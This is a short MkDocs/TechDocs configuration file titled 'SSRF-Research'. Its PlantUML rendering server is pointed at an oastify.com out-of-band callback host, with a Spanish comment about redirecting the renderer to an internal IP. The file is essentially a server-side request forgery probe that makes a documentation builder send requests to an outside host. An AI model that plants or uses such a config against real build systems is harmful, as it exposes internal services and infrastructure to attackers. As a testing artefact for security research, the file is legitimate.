site_name: SSRF-Research
plugins:
  - techdocs-core
markdown_extensions:
  - plantuml_markdown:
      # Intentamos cambiar el servidor de renderizado a una IP interna
      server: http://o9y9olw32d4ce0379i84k4bssjyam0ap.oastify.com





